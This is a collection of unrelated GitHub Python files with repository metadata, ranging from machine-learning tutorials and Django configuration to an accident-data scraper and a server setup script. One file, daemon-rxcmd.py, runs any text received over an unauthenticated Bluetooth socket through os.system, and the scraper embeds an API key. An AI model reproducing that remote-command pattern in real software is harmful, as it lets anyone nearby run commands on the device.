e = model.evaluate(input_fn)
print("Testing Accuracy:", e['accuracy'])
|
[
"[email protected]"
] | |
8f5adc4fc685a863c2fb0e954b71e6b597fbc626
|
0ff5a88f42d5e6179583a3251b892b93cf1f6d0d
|
/L1/1_3/1_3_stochastic_gradient_descent.py
|
0eb1234bf20283ced231ac91396577bf9e55c02c
|
[] |
no_license
|
kaz-nakazawa/DL_E_report
|
a6027f6197b061b63fd7cda022ec12dd10b87cf3
|
c3f8ed72d04a2c35c5da075ba5747c8f9c1bea84
|
refs/heads/master
| 2020-06-12T23:49:39.019418 | 2019-07-15T08:29:14 | 2019-07-15T08:29:14 | 194,465,072 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,701 |
py
|
# coding: utf-8
# Stochastic gradient descent
import sys, os
sys.path.append(os.pardir)  # setting to allow imports from the parent directory
import numpy as np
from common import functions
import matplotlib.pyplot as plt
def print_vec(text, vec):
print("*** " + text + " ***")
print(vec)
#print("shape: " + str(x.shape))
print("")
# Function to use as a sample
# an AI that predicts the value of y
def f(x):
    y = 3 * x[0] + 2 * x[1]
    return y
# Initial setup
def init_network():
# print("##### ネットワークの初期化 #####")
network = {}
nodesNum = 10
network['W1'] = np.random.randn(2, nodesNum)
network['W2'] = np.random.randn(nodesNum)
network['b1'] = np.random.randn(nodesNum)
network['b2'] = np.random.randn()
# print_vec("重み1", network['W1'])
# print_vec("重み2", network['W2'])
# print_vec("バイアス1", network['b1'])
# print_vec("バイアス2", network['b2'])
return network
# 順伝播
def forward(network, x):
# print("##### 順伝播開始 #####")
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
u1 = np.dot(x, W1) + b1
z1 = functions.relu(u1)
    ## Try it out
#z1 = functions.sigmoid(u1)
u2 = np.dot(z1, W2) + b2
y = u2
# print_vec("総入力1", u1)
# print_vec("中間層出力1", z1)
# print_vec("総入力2", u2)
# print_vec("出力1", y)
# print("出力合計: " + str(np.sum(y)))
return z1, y
# 誤差逆伝播
def backward(x, d, z1, y):
# print("\n##### 誤差逆伝播開始 #####")
grad = {}
W1, W2 = network['W1'], network['W2']
b1, b2 = network['b1'], network['b2']
    # delta at the output layer
delta2 = functions.d_mean_squared_error(d, y)
    # gradient of b2
grad['b2'] = np.sum(delta2, axis=0)
    # gradient of W2
grad['W2'] = np.dot(z1.T, delta2)
    # delta at the hidden layer
delta1 = np.dot(delta2, W2.T) * functions.d_relu(z1)
    ## Try it out
# delta1 = np.dot(delta2, W2.T) * functions.d_sigmoid(z1)
delta1 = delta1[np.newaxis, :]
    # gradient of b1
grad['b1'] = np.sum(delta1, axis=0)
x = x[np.newaxis, :]
    # gradient of W1
grad['W1'] = np.dot(x.T, delta1)
# print_vec("偏微分_重み1", grad["W1"])
# print_vec("偏微分_重み2", grad["W2"])
# print_vec("偏微分_バイアス1", grad["b1"])
# print_vec("偏微分_バイアス2", grad["b2"])
return grad
# サンプルデータを作成
data_sets_size = 100000
data_sets = [0 for i in range(data_sets_size)]
for i in range(data_sets_size):
data_sets[i] = {}
    # set random values
    data_sets[i]['x'] = np.random.rand(2)
    ## Try it out: setting the input values
    # data_sets[i]['x'] = np.random.rand(2) * 10 -5 # random values from -5 to 5
    # set the target output
    data_sets[i]['d'] = f(data_sets[i]['x'])
losses = []
# learning rate
learning_rate = 0.07
# number of samples to draw
epoch = 1000
# initialize the parameters
network = init_network()
# randomly sample the data
random_datasets = np.random.choice(data_sets, epoch)
# gradient descent loop
for dataset in random_datasets:
x, d = dataset['x'], dataset['d']
z1, y = forward(network, x)
grad = backward(x, d, z1, y)
    # apply the gradients to the parameters
for key in ('W1', 'W2', 'b1', 'b2'):
network[key] -= learning_rate * grad[key]
    # error
loss = functions.mean_squared_error(d, y)
losses.append(loss)
print("##### 結果表示 #####")
lists = range(epoch)
plt.plot(lists, losses, '.')
plt.title('loss')
# show the graph
plt.show()
|
[
"[email protected]"
] | |
5b2cb107207f28aa4fb223e5d981c7c6eb002b41
|
8d6dc6024e8aca3ab1e11514f9c36911e5225df2
|
/004_Homework/viking_loto.py
|
7d5f868e4d9876867d9e0be4d12a83812dad7f71
|
[] |
no_license
|
JanaSed/Homeworks
|
16bfeecd35eeb853c9e72108c3fb5e5419bb8f8f
|
efe0de7174385563358c48f5d67da5e05d686e66
|
refs/heads/master
| 2023-07-04T21:54:21.279882 | 2021-08-16T17:52:28 | 2021-08-16T17:52:28 | 379,962,510 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 113 |
py
|
import random
from random import randint
print(random.sample(range(48), 6))
print(random.sample(range(1, 5), 1))
|
[
"[email protected]"
] | |
1ac88f58fc4e55c54fef3bbf16f971a05570079f
|
90af0a07a800fe88902e5c8c160e39456ecf9f5b
|
/pydir/daemon-rxcmd.py
|
00f98fcc7ad708cdb8461545e3e983acadcf9667
|
[
"Apache-2.0"
] |
permissive
|
jmdahling/RxCmd
|
8fb1cdc32764947b35416a46e2a0764634784cea
|
000375e30f1cee622c188967b8de7874e982fd0d
|
refs/heads/master
| 2021-01-19T19:45:46.878305 | 2017-04-16T19:43:28 | 2017-04-16T19:43:28 | 88,442,730 | 0 | 0 | null | 2017-04-16T21:10:04 | 2017-04-16T21:10:04 | null |
UTF-8
|
Python
| false | false | 1,253 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2016 F Dou<[email protected]>
# See LICENSE for details.
import bluetooth
import os
import logging
import time
from daemon import runner
class RxCmdDaemon():
def __init__(self):
self.stdin_path = '/dev/null'
# self.stdout_path = '/dev/tty'
self.stdout_path = '/home/robot/pydir/daemon.log'
self.stderr_path = '/home/robot/pydir/daemon.log'
# self.stderr_path = '/dev/tty'
self.pidfile_path = '/tmp/RxCmdDaemon.pid'
self.pidfile_timeout = 5
def run(self):
while True:
server_sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )
port = 1
server_sock.bind(("",port))
server_sock.listen(1)
client_sock,address = server_sock.accept()
print "Accepted connection from ",address
try:
while True:
data = client_sock.recv(1024)
print "received [%s]" % data
os.system(data)
except Exception as e:
logging.exception(e)
rxCmdDaemon = RxCmdDaemon()
daemon_runner = runner.DaemonRunner(rxCmdDaemon)
daemon_runner.do_action()
|
[
"[email protected]"
] | |
419b271226298b03583d193a10914df6729aeb1c
|
137e4fc41341350550106ce897eba9617e34a4d5
|
/example_feedback/urls.py
|
4a76a819aa393aba1b5d28aa927a76b6b5be0963
|
[] |
no_license
|
javierLiarte/django-simple-feedback-1
|
888425d288965ad8ee581d91be12af28ee87d14e
|
1aca0df0b9a1773624bfb3d3ba6aa8696d8d239b
|
refs/heads/master
| 2021-01-17T06:56:47.592413 | 2014-10-10T15:42:58 | 2014-10-10T15:42:58 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 825 |
py
|
from django.conf.urls.defaults import patterns, include, url
from django.views.generic.simple import direct_to_template
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url('^$', direct_to_template, {'template': 'base.html'}),
    url(r'^feedback/', include('feedback.urls')),
(r'^accounts/login/$', 'django.contrib.auth.views.login'),
# Examples:
# url(r'^$', 'example_feedback.views.home', name='home'),
# url(r'^example_feedback/', include('example_feedback.foo.urls')),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
)
|
[
"[email protected]"
] | |
fb9ba2d39a850faee8978b4ef1f593af35a95224
|
fd71857adc56fe72bbb3c302a1013e8de8511c50
|
/bitcoin/utxo.py
|
b95630c872cd8cc9007f834a233bda67c0d03e98
|
[] |
no_license
|
AbhishekAshokDubey/blockchain_python
|
a209b5f23e16c5e8b1739a57eecfd95952ed52ae
|
e64c72420bfe746a87f5255f94a8f4c1cf1a8789
|
refs/heads/master
| 2020-03-25T14:36:47.942295 | 2018-08-07T11:29:50 | 2018-08-07T11:29:50 | 143,863,591 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,156 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 27 15:44:15 2018
@author: ADubey4
"""
"""Done"""
# http://gerg.ca/blog/post/2012/python-comparison/
# https://docs.python.org/3.5/library/functools.html#functools.total_ordering
from functools import total_ordering
import copy
@total_ordering
class UTXO :
@staticmethod
def cmp(a, b):
return (a > b) - (a < b)
def __init__(self, tx_hash, index):
self.tx_hash = copy.copy(tx_hash)
self.index = index
def equals(self, other_utxo=None):
return ((self.tx_hash == other_utxo.tx_hash) and (self.index == other_utxo.index))
def get_hash_code(self):
hash_code = 1
hash_code = 17 + self.index
hash_code = hash_code * 31 + hash(self.tx_hash)
return hash_code
    ## everything below: the way to implement a comparable in python
def __cmp__(self, other_utxo):
other_hashcode = other_utxo.tx_hash
other_index = other_utxo.index
if(other_index > self.index):
return -1
elif (other_index < self.index):
return 1
else:
if len(other_hashcode) > len(self.tx_hash):
return -1
elif len(other_hashcode) < len(self.tx_hash):
return 1
else:
return self.cmp(self.tx_hash, other_hashcode)
    # __cmp__ is removed from python 3.X and hence we need to implement something more
def __eq__(self, other):
return self.__cmp__(other) == 0
def __lt__(self, other):
return self.__cmp__(other) < 0
# required only when we use the object as dict key or in set
# as they Data structures uses hash internally
# def __hash__(self):
# return self.get_hash_code()
# below code is not required because of @total_ordering, else we would need everything below
# def __ne__(self, other):
# return self.__cmp__(other) != 0
# def __gt__(self, other):
# return self.__cmp__(other) > 0
# def __ge__(self, other):
# return self.__cmp__(other) >= 0
# def __le__(self, other):
# return self.__cmp__(other) <= 0
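# Illustrative usage (not part of the original class): UTXOs order by output index
# first, then by transaction hash, exactly as implemented in __cmp__ above.
if __name__ == '__main__':
    a = UTXO(b'\x01' * 32, 0)
    b = UTXO(b'\x01' * 32, 1)
    print(a < b)                             # True: lower output index sorts first
    print(a.equals(UTXO(b'\x01' * 32, 0)))   # True: same hash and same index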
|
[
"[email protected]"
] | |
8a8680338eb791a54e04854473d5d7158ca44726
|
55c250525bd7198ac905b1f2f86d16a44f73e03a
|
/Python/pytype/pytype/tools/merge_pyi/test_data/var_annot.comment.py
|
8d3907c0a79e522e7a66e1587e8a8ca132b76a38
|
[] |
no_license
|
NateWeiler/Resources
|
213d18ba86f7cc9d845741b8571b9e2c2c6be916
|
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
|
refs/heads/master
| 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null |
UTF-8
|
Python
| false | false | 128 |
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:fbf532cb3bc3376967d6a665559e5b50273ee6371ee9080fcc2f2d7e3592c2eb
size 156
|
[
"[email protected]"
] | |
83cef915c5831fa22780de720175e98cce80ccc3
|
3a4f14d6638bc0c12c129ed73c6c3543437203df
|
/src/morphforgeexamples/multicell_simulation/multicell_simulation010.py
|
4e246688646bd3831457507719b3611426692cef
|
[
"BSD-2-Clause"
] |
permissive
|
unidesigner/morphforge
|
ef04ccb3877f069a0feea72eb1b44c97930dac44
|
510cd86549b2c2fb19296da2d4408ed8091fb962
|
refs/heads/master
| 2021-01-15T22:34:28.795355 | 2012-04-05T08:55:12 | 2012-04-05T08:55:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 51 |
py
|
"""[*] Two cells connected with an AMPA synapse"""
|
[
"[email protected]"
] | |
2c6659fa00d6ac07197690b564d7aac721369d86
|
a2fb6bda878d79e4b31d8b3d76d9a2a40dc604ef
|
/backend/notes/serializers.py
|
6388c086796a97dc998df942375fbc474461a86c
|
[] |
no_license
|
Aruta1ru/budgeter
|
b3224b68601df29e952d34630d2c5891b3883291
|
672232d1be853a948171825d7b380d8d2e131f94
|
refs/heads/master
| 2023-03-27T04:01:09.424337 | 2021-03-12T12:27:54 | 2021-03-12T12:27:54 | 346,987,850 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 319 |
py
|
from rest_framework import serializers
from .models import Category, Note
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = '__all__'
class NoteSerializer(serializers.ModelSerializer):
class Meta:
model = Note
fields = '__all__'
|
[
"[email protected]"
] | |
5120c0f875dbadae51d4066d3e76b655e03280e0
|
7c222e4dd6e434ee6a489c0e518744245735cce8
|
/hackerspace_site/apps/blog/forms.py
|
2858af5dd2f46bae7db8f12edf12ec88d952961e
|
[] |
no_license
|
HackerSpace-PESU/hackerspace.pes.edu
|
ad9183eb4421d9c8534d98dbfdcf80069f0b58b3
|
0a45bc9c1ed58eba83d3c5b04f054cd36c7e9fc7
|
refs/heads/master
| 2023-05-14T00:34:49.590888 | 2021-05-27T09:51:56 | 2021-05-27T09:51:56 | 322,908,540 | 9 | 4 | null | 2021-05-27T09:51:57 | 2020-12-19T18:07:54 |
HTML
|
UTF-8
|
Python
| false | false | 373 |
py
|
from django.forms import ModelChoiceField, ModelForm
from martor.fields import MartorFormField
from .models import Author, Blog
class NewBlogForm(ModelForm):
author = ModelChoiceField(
queryset=Author.objects.all(),
)
blog_in_markdown = MartorFormField()
class Meta:
model = Blog
fields = ["author", "title", "blog_in_markdown"]
|
[
"[email protected]"
] | |
407de71cbc79d7d56529dc074e6ec44af29d49ae
|
d5a7202c1cd60ab487c4f5367bc9a4bfa3de3440
|
/TestBed/src/brain/examples/misc/ring.py
|
1aa39dac35d163116bde320f633d1b2500d7e86b
|
[] |
no_license
|
thanhmaikmt/pjl
|
40b202fa8bd513f2103bc82f3b770a1fcdcb4141
|
f2fb00f297c63a5211198cd47edce0aacfba6c11
|
refs/heads/master
| 2021-01-19T09:48:51.301034 | 2014-04-04T18:28:59 | 2014-04-04T18:28:59 | 40,103,495 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 393 |
py
|
"""
A ring of integrate-and-fire neurons.
"""
from brian import *
tau = 10 * ms
v0 = 11 * mV
N = 20
w = 1 * mV
ring = NeuronGroup(N, model='dv/dt=(v0-v)/tau : volt', threshold=10 * mV, reset=0 * mV)
W = Connection(ring, ring, 'v')
for i in range(N):
W[i, (i + 1) % N] = w
ring.v = rand(N) * 10 * mV
S = SpikeMonitor(ring)
run(300 * ms)
raster_plot(S)
show()
|
[
"pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e"
] |
pauljohnleonard@fadc175c-ebca-11de-a75d-bbceaaa5444e
|
4e6c7d73d626383ba1cf1342cec8ceeefd7552ac
|
e6cc19f280d737e4c37ad499c9c5370ec9079a1f
|
/project_euler_solutions/problem_9.py
|
e18867f8541e3b78ce778214acc2cc1a408672a8
|
[] |
no_license
|
jdgsmallwood/ProjectEuler
|
f705611b903d6615894b60c087ee2e74088715c2
|
f310421ca82046fdf18f606e8752ed9ce6c8be36
|
refs/heads/master
| 2023-01-07T16:08:46.165465 | 2020-11-14T00:57:01 | 2020-11-14T00:57:01 | 111,932,708 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 417 |
py
|
target = 1000
#We're making an assumption without loss of generality that a < b < c
for a in range(1,1000):
for b in range(a,1000):
c = 1000 - a - b
if a**2 + b**2 == c**2:
            if a + b + c == target:
print('A: %f' % a)
print('B: %f'% b)
print("C: %f" % c)
print(a*b*c)
break
# I think the answer is 31875000
|
[
"[email protected]"
] | |
125fd5dd7734d83661f29aaad97899bcd613ff7e
|
8b5225609f76dab9afb261654d27074c1ce24d03
|
/md_320_2.py
|
5effc01ceb3db4260a53eb402c8f3507ef17d65f
|
[] |
no_license
|
wlstjd2378/python4095
|
27a55db195380b82641cab7cba5fee3ed8aaff83
|
78f45ea30aa3dabd14d5422813092ba8c031c8e3
|
refs/heads/master
| 2020-05-30T17:49:50.405382 | 2019-06-03T03:18:58 | 2019-06-03T03:18:58 | 189,883,998 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,973 |
py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
url = 'http://apis.data.go.kr/B552061/jaywalking/getRestJaywalking'
queryParams = '?' + 'serviceKey=' + 'nBR6ds%2BFTLtKBfkc9qEKhBBGdZF09DnpkSRWSKTyxiHp%2BRVBtJbWjTQMqvvMb%2FVf0TGceYhCeGyvpHtJAhIlJA%3D%3D' \
+ '&searchYearCd=' + '2017' \
+ '&siDo=' + '26' \
+ '&guGun=' + '320' \
+ '&type=' + 'xml' \
+ '&numOfRows=' + '25' \
+ '&pageNo=' + '1'
url = url + queryParams
result = requests.get(url)
bs_obj = BeautifulSoup(result.content, "html.parser")
data1 = bs_obj.findAll('spot_nm') # accident-prone area name
data2 = bs_obj.findAll('occrrnc_cnt') # number of accidents
data3 = bs_obj.findAll('dth_dnv_cnt') # deaths
data4 = bs_obj.findAll('caslt_cnt') # injured
data5 = bs_obj.findAll('se_dnv_cnt') # seriously injured
data6 = bs_obj.findAll('sl_dnv_cnt') # slightly injured
# list_data = {'다발지역명':[],'발생건수':[],'사망자수':[],\
# '부상자수':[],'중상':[],'경상':[],\
# '시군구':['중구','서구','동구','영도구','부산진구','동래구','남구','북구','해운대구','사하구','금정구','강서구','연제구','수영구','사상구','기장군']}
data = {'시군구': [],'다발지역명':[],'발생건수':[],'사망자수':[],'부상자수':[],'중상':[],'경상':[]}
d1,d2,d3,d4,d5,d6,d7 = [],[],[],[],[],[],[]
for i in range(0,len(data1)):
d1.append(data1[i].get_text())
d2.append(data2[i].get_text())
d3.append(data3[i].get_text())
d4.append(data4[i].get_text())
d5.append(data5[i].get_text())
d6.append(data6[i].get_text())
d7.append('북구')
data['다발지역명'] = d1
data['발생건수'] = d2
data['사망자수'] = d3
data['부상자수'] = d4
data['중상'] = d5
data['경상'] = d6
data['시군구'] = d7
df_320_2 = pd.DataFrame(data, columns = ['시군구','다발지역명','발생건수','사망자수','부상자수','중상','경상'])
#print(df_320_2)
|
[
"[email protected]"
] | |
85a9386cf8f783bd013959909bab9d7614a1d07a
|
78aa3c2e1bf95fa1e440f40c0a27273d5f1f6284
|
/com.kuta.python.basedata/Tuple.py
|
8bc3b8d619a73ec7ac5df3d0d6ecdd51184875d3
|
[] |
no_license
|
kutala/HelloPython
|
c98b2fe1be67b5bbd08a0ada08b875f7ce2075dd
|
d685a27956aecd01839b05523fe1f2b8b6891296
|
refs/heads/master
| 2021-01-01T15:30:14.962842 | 2016-11-29T09:38:39 | 2016-11-29T09:38:39 | 40,281,912 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 395 |
py
|
# -*- coding: UTF-8 -*-
tuple = ( 'abcd', 786 , 2.23, 'john', 70.2 )
tinytuple = (123, 'john')
print tuple             # print the complete tuple
print tuple[0]          # print the first element of the tuple
print tuple[1:3]        # print the second and third elements
print tuple[2:]         # print all elements from the third one to the end
print tinytuple * 2     # print the tuple twice
print tuple + tinytuple # print the concatenation of the tuples
|
[
"[email protected]"
] | |
69b82c6e7c1b89da41ffdaf1099f828d16af52f8
|
3f3091436da6e2032949b3c474a663fee188f5d5
|
/webempresa/services/migrations/0004_project.py
|
ce1253050d026a35927123cc36077ac8f0560332
|
[] |
no_license
|
juanantoniotora/Curso_DJango2_WebCorporativa_Ejemplo
|
b9993bc740ee2b47c034938870841d5ee35152e7
|
975acbc0a601206edeb6235588e710c3698a192d
|
refs/heads/master
| 2022-12-07T07:01:50.230314 | 2019-10-10T19:26:00 | 2019-10-10T19:26:00 | 214,251,337 | 0 | 0 | null | 2022-11-22T02:24:23 | 2019-10-10T18:02:07 |
Python
|
UTF-8
|
Python
| false | false | 1,192 |
py
|
# Generated by Django 2.2.4 on 2019-10-05 18:44
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('services', '0003_delete_project'),
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Título')),
('subtitle', models.CharField(max_length=200, verbose_name='Sub-título')),
('content', models.TextField(default='', verbose_name='Contenido')),
('image', models.ImageField(upload_to='', verbose_name='Imagen')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Creado')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Actualizado')),
],
options={
'verbose_name': 'modelo_Servicio',
'verbose_name_plural': 'tabla_Servicios',
'ordering': ['-created'],
},
),
]
|
[
"[email protected]"
] | |
ed56edac7dcdd5606246aad436c9d852a3f3f40f
|
786f34fc2fea4f764d083b2bb3fd75222dfbbac1
|
/jobsPortal/jobsPortal/urls.py
|
df7cc52aa22d588c3e134c6f19a0b5e4a7a1e052
|
[] |
no_license
|
shivendra04/DjangoProjects
|
6c4ddc58588c7033afa7a1f5a299e33b1afb3897
|
d3a190fd47582190f2ad41d8dc4b30b7841cf679
|
refs/heads/master
| 2022-12-20T00:01:22.524044 | 2020-09-22T08:05:43 | 2020-09-22T08:05:43 | 297,578,265 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 994 |
py
|
"""jobsPortal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from jobsApp import views
urlpatterns = [
path('admin/', admin.site.urls),
path('home/', views.home),
path('home/hydjobs/', views.hydjob),
path('home/punejobs/', views.punejob),
path('home/banglorejobs/', views.banglorejob),
path('home/chennaijobs/', views.chennaijob),
]
|
[
"[email protected]"
] | |
b1a8761bb8817603f8a347b24bff02b3180b2855
|
2fc0ae670f7200a7ad936eb1e3c9d56b5ef879df
|
/create.py
|
8931526e88b73d1ab967c5b07648b2e2abae3857
|
[] |
no_license
|
alexlesan/python_automatization
|
0013c7051c94175bf17dc4ac6203db7e89f1db94
|
b6a3a4f9bd1b282dee54f5f6c783f5aa0d23dfa0
|
refs/heads/master
| 2020-09-11T06:53:54.108793 | 2019-11-15T18:24:03 | 2019-11-15T18:24:03 | 221,979,550 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,141 |
py
|
import os, errno, sys, config
import argparse
import subprocess
import time
#parser arguments
parser = argparse.ArgumentParser(description='Create new local project')
parser.add_argument('--name', type=str, help='Name of the project')
parser.add_argument('--open', type=int, nargs='?', const=1, help='Open the editor with the project')
# make the directory of the project
def make_dir(domain):
try:
path_dir = config.PATH+domain
os.mkdir(path_dir, config.ACCESS_RIGHTS)
os.chmod(path_dir, config.ACCESS_RIGHTS)
print ("Successfully created the directory: "+path_dir)
make_nginx_file(domain)
except OSError as e:
str_error = e.strerror
if e.errno == errno.EEXIST:
str_error = "\tThe directory already exists."
str = "\tCoudn't create the directory: "+path_dir+"."
print(str)
print(str_error)
# make the nginx sites-available file and link it into sites-enabled
def make_nginx_file(domain):
try:
filename_loc = domain+".loc"
full_path = config.NGINX_SITE_AVAILABLES_PATH+filename_loc
site_enabled_path = config.NGINX_SITE_ENABLED_PATH+filename_loc
#replace in file template and copy to nginx
temp_file = open(config.TEMPLATE_VH, 'r')
dest_file = open(full_path, 'w')
file_lines = temp_file.readlines()
for line in file_lines:
res = line.replace("{PROJECT_NAME}", domain)
dest_file.write(res.replace("{SERVER_NAME}", filename_loc))
temp_file.close()
dest_file.close()
#create the symlink to site-enabled
os.symlink(full_path, site_enabled_path)
print("Symlink was created.")
#update the hosts file
update_hosts_file(domain)
#restart the nginx server
restart_nginx()
except OSError as e:
print (e.strerror)
# update the hosts file with new virutal host url
def update_hosts_file(domain):
try:
str_line = "\n127.0.0.1\t"+domain.lower()+".loc"
with open(config.HOSTS_FILE_PATH, 'a') as f:
f.write(str_line)
print("Hosts file was updated.")
except OSError as e:
print(e.strerror)
# restart the nginx server after modifications
def restart_nginx():
try:
#restart the nginx
command_str = "sudo systemctl restart nginx"
os.system(command_str)
print("The nginx server was restarted successfully")
except:
print("Coudn't restart the nginx server")
# check and run the command
if __name__ == '__main__':
param = vars(parser.parse_args())
    domain = param['name'].lower() if param['name'] else ''
open_editor = param['open']
if domain != '':
make_dir(domain)
if open_editor == 1:
# open the project in atom editor
print("\t Opening the Atom editor...")
# atom_cmd = ["atom", config.PATH+domain]
# subprocess.Popen(atom_cmd).wait()
os.system('atom '+config.PATH+domain)
time.sleep(1)
print("\t The process was finished.")
else:
print("No domain name was provided.")
|
[
"[email protected]"
] | |
88f37dcfa3636c5a91c3546ae84c383167f931e2
|
5ec06dab1409d790496ce082dacb321392b32fe9
|
/clients/python-flask/generated/openapi_server/models/com_adobe_cq_social_commons_emailreply_impl_custom_email_client_provider_properties.py
|
4d9bc47c42da303a7c969c543512bee62080c310
|
[
"Apache-2.0"
] |
permissive
|
shinesolutions/swagger-aem-osgi
|
e9d2385f44bee70e5bbdc0d577e99a9f2525266f
|
c2f6e076971d2592c1cbd3f70695c679e807396b
|
refs/heads/master
| 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 |
Apache-2.0
| 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null |
UTF-8
|
Python
| false | false | 4,134 |
py
|
# coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from openapi_server.models.base_model_ import Model
from openapi_server.models.config_node_property_array import ConfigNodePropertyArray # noqa: F401,E501
from openapi_server.models.config_node_property_integer import ConfigNodePropertyInteger # noqa: F401,E501
from openapi_server import util
class ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, priority_order: ConfigNodePropertyInteger=None, reply_email_patterns: ConfigNodePropertyArray=None): # noqa: E501
"""ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties - a model defined in OpenAPI
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type priority_order: ConfigNodePropertyInteger
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:type reply_email_patterns: ConfigNodePropertyArray
"""
self.openapi_types = {
'priority_order': ConfigNodePropertyInteger,
'reply_email_patterns': ConfigNodePropertyArray
}
self.attribute_map = {
'priority_order': 'priorityOrder',
'reply_email_patterns': 'replyEmailPatterns'
}
self._priority_order = priority_order
self._reply_email_patterns = reply_email_patterns
@classmethod
def from_dict(cls, dikt) -> 'ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The comAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties. # noqa: E501
:rtype: ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties
"""
return util.deserialize_model(dikt, cls)
@property
def priority_order(self) -> ConfigNodePropertyInteger:
"""Gets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyInteger
"""
return self._priority_order
@priority_order.setter
def priority_order(self, priority_order: ConfigNodePropertyInteger):
"""Sets the priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param priority_order: The priority_order of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type priority_order: ConfigNodePropertyInteger
"""
self._priority_order = priority_order
@property
def reply_email_patterns(self) -> ConfigNodePropertyArray:
"""Gets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:return: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:rtype: ConfigNodePropertyArray
"""
return self._reply_email_patterns
@reply_email_patterns.setter
def reply_email_patterns(self, reply_email_patterns: ConfigNodePropertyArray):
"""Sets the reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:param reply_email_patterns: The reply_email_patterns of this ComAdobeCqSocialCommonsEmailreplyImplCustomEmailClientProviderProperties.
:type reply_email_patterns: ConfigNodePropertyArray
"""
self._reply_email_patterns = reply_email_patterns
|
[
"[email protected]"
] | |
b24e6f5f4ec62487169653f0ea11233511822384
|
84baad5eae2bd1adb53e71429b17dcb7198e27ab
|
/keystone/keystone/cli.py
|
81fb2af4b2312a5fe763f8a695af31348765835c
|
[
"Apache-2.0"
] |
permissive
|
bopopescu/x7_dep
|
396812eb50f431ab776bc63b8fce5f10f091d221
|
9a216e6fa3abdba1f63f9d36a4947c2a27de2bb7
|
refs/heads/master
| 2022-11-21T20:06:02.235330 | 2012-11-14T15:25:39 | 2012-11-14T15:25:39 | 282,193,462 | 0 | 0 | null | 2020-07-24T10:42:38 | 2020-07-24T10:42:38 | null |
UTF-8
|
Python
| false | false | 4,124 |
py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
